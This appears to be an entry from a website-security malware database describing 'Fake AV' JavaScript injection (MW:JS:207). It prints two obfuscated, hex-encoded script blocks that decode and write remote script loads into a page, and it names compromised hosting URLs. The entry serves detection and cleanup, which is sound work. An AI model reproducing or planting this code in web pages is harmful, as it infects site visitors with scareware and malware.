Malware Entries

Malware entry: MW:JS:207

Description: Encoded javascript malware to load the “Fake AV” virus from: http://students.goscc.org/wp-includes/images/smilies/icon_vink.gif, http://kirsten-d.com/wp-content/plugins/akismet/akesmet.php and other sites. Affecting: Any web site Malware dump:

<script>var _0x67c9=["x3Dx74x64x73x6Ax71x75x21x74x73x64x3Ex23x69x75x75x71x3Bx30x30x74x75x76x65x66x6Fx75x74x2Fx68x70x74x64x64x2Fx70x73x68x30x78x71x2Ex6Ax6Fx64x6Dx76x65x66x74x30x6Ax6Ex62x68x66x74x30x74x6Ex6Ax6Dx6Ax66x74x30x6Ax64x70x6Fx60x77x6Ax6Fx6Cx2Fx68x6Ax67x23x3Fx3Dx30x74x64x73x6Ax71x75x3F","","x6Cx65x6Ex67x74x68","x63x68x61x72x43x6Fx64x65x41x74","x26","x21","x66x72x6Fx6Dx43x68x61x72x43x6Fx64x65","x77x72x69x74x65"];var s=_0x67c9[0];m=_0x67c9[1];for(i=0;i<s[_0x67c9[2]];i++){if(s[_0x67c9[3]](i)==28){m+=_0x67c9[4];} else {if(s[_0x67c9[3]](i)==23){m+=_0x67c9[5];} else {m+=String[_0x67c9[6]](s[_0x67c9[3]](i)-1);} ;} ;} ;document[_0x67c9[7]](m);</script>
<scrip>tvar _0xc060=["x3Dx66x6Ex63x66x65x21x74x73x64x3Ex23x69x75x75x71x3Bx30x30x6Cx6Ax73x74x75x66x6Fx2Ex65x2Fx64x70x6Ex30x78x71x2Ex64x70x6Fx75x66x6Fx75x30x71x6Dx76x68x6Ax6Fx74x30x62x6Cx6Ax74x6Ex66x75x30x62x6Cx66x74x6Ex66x75x2Fx71x69x71x23x21x78x6Ax65x75x69x3Ex31x21x69x66x6Ax68x69x75x3Ex31x21x74x75x7Ax6Dx66x3Ex23x63x70x73x65x66x73x3Bx6Fx70x6Fx66x3Cx23x21x75x7Ax71x66x3Ex23x62x71x71x6Dx6Ax64x62x75x6Ax70x6Fx30x71x65x67x23x3Fx3Dx30x66x6Ex63x66x65x3F","","x6Cx65x6Ex67x74x68","x63x68x61x72x43x6Fx64x65x41x74","x26","x21","x66x72x6Fx6Dx43x68x61x72x43x6Fx64x65","x77x72x69x74x65"];var s=_0xc060[0];m=_0xc060[1];for(i=0;i<s[_0xc060[2]];i++){if(s[_0xc060[3]](i)==28){m+=_0xc060[4];} else {if(s[_0xc060[3]](i)==23){m+=_0xc060[5];} else {m+=String[_0xc060[6]](s[_0xc060[3]](i)-1);} ;} ;} ;document[_0xc060[7]](m);</script>

Sign Up or visit our blog